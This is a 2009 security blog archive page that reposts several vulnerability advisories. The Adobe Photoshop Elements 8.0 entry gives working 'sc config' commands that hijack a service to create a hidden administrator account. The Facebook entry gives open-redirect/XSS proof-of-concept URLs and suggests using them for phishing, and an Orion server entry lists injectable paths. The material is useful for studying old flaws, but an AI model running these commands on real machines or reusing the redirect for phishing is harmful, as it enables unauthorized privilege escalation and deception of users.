Archive for September, 2009

« Older Pages

Adobe Photoshop Elements 8.0 Active File Monitor Service Bad Security Descriptor Local Elevation Of Privileges

Wednesday, September 30th, 2009

Adobe Photoshop Elements 8.0 Active File Monitor Service Bad Security Descriptor Local Elevation Of Privileges

Adobe photoshop elements 8.0 suffers of vulnerability discovered by Nine Situations Group, the vulnerability research group founded by italian programmer and hacker retrogod, R.I.P .

The “Adobe Active File Monitor V8″ service is installed with an improper security descriptor.
A malicious user of the Users group (which on xp means a “limited account”) can stop the service, then invoke the “sc config” command to replace the binary path with a value of choice, then restart the service to run the command with SYSTEM privileges ex., run theese commands as a limited user:

sc stop “AdobeActiveFileMonitor8.0″
sc config “AdobeActiveFileMonitor8.0″ binPath= “cmd /c net user adobe kills /add && net localgroup Administrators adobe /add”
sc start “AdobeActiveFileMonitor8.0″
runas /noprofile /user:%COMPUTERNAME%\adobe cmd

login as administrator with password “kills”

Tags: , , , , ,
Posted in Exploits, Hacking | 1 Comment »

HP Remote Graphics Software (RGS) Sender, Remote Unauthorized Access

Tuesday, September 29th, 2009

Hewlett-Packard Development Company, L.P.

HP Remote Graphics Software (RGS) Sender, Remote Unauthorized Access

A potential security vulnerability has been identified with HP Remote Graphics Software (RGS) Sender. The vulnerability could be exploited remotely to gain unauthorized access.

Impact
Remote unauthorized access

Patch
Hp provides a software update here

Tags: , , , ,
Posted in Exploits, Hacking, Infosecurity, PoC | Comments Off

Facebook XSS URL String Evasion

Tuesday, September 29th, 2009

Facebook Social Network XSS Url string Evasion – Facebook suffers of a xss url evasion

Example

http://apps.facebook.com/quizzname/?next=[]

Proof of Concept

http://apps.facebook.com/quelendroitltwgzmv/?next=link

http://apps.facebook.com/queldictateursommeil/?next=xss

You can also use this vulnerability to redirect victim to a phishing page :

http://apps.facebook.com/quizzname/?next=link

We all love Facebook :-(

Tags: , , , , ,
Posted in Exploits, Hacking, Infosecurity, News, PoC, Stuffs | Comments Off

Gentoo Certificate validation error Vulnerability

Sunday, September 27th, 2009

Gentoo Certificate validation error Vulnerability

An error in the X.509 certificate handling of cURL might enable remote attackers to conduct man-in-the-middle attacks. cURL that is a command line tool for transferring files with URL syntax,supporting numerous protocols, does not properly handle fields in X.509 certificates that contain an ASCII NUL (\0) character. Specifically, the processing of such fields is stopped at the first occurence of a NUL character. This type of vulnerability was recently discovered by Dan Kaminsky and Moxie Marlinspike.
A remote attacker might employ a specially crafted X.509 certificate (that for instance contains a NUL character in the Common Name field) to conduct man-in-the-middle attacks.

emerge –sync
emerge –ask –oneshot –verbose =net-misc/curl-7.19.6

Tags: , , , , , , ,
Posted in Bsd and *nix, Exploits, Infosecurity, Music, PoC, Stuffs | Comments Off

Orion Application Server XSS Vulnerability

Sunday, September 27th, 2009

Orion Application Server XSS Vulnerability

A vulnerability in Orion Application Server (Java) allows an attacker to cause execution of malicious scripting code in the browser of a user who clicks on a link to a Orion Application server site. Such code would run within the security context of the target domain. This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: session IDs) to unauthorised third parties.

/examples/jsp/sessions/carts.jsp?item=

/examples/jsp/checkbox/checkresult.jsp?fruit=

/examples/jsp/cal/cal2.jsp?time=

Tags: , , , , ,
Posted in Exploits, Hacking, Infosecurity, PoC | 1 Comment »

« Older Pages